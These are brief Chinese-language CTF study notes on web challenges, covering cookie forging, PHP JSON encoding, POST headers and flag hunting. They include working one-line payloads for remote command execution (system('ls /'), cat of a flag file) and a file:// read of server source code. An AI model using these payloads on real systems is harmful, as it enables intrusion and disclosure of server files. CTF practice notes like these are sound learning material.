1.伪造cookie时,注意cookie:后不要回车什么的,直接连着写即可,否则会报错
例题攻防世界fileinclude
2.php中json()encode编码出的是双引号包含的,eg: {"x":"1"}
3.rce命令输出的一些细节
?url=system("ls /"); 注意:ls后面要有一个空格,且最后以分号结尾
?url=system("cat /flllllaaaaaaggggggg");
例题NSSCTF 参考博主[SWPUCTF 2021 新生赛]easyrce_偶尔躲躲乌云334的博客-CSDN博客
4.post请求
Content-Type:application/x-www-form-urlencoded
5.火狐全文查找
Ctrl+f
eg.NSSCTF
解题步骤:1.url/README.md 找到登录账号密码
2.url/phpinfo.php 在里面全文查找,找到flag信息
6.获取页面源码的伪协议
?url=file:///var/www/html/index.php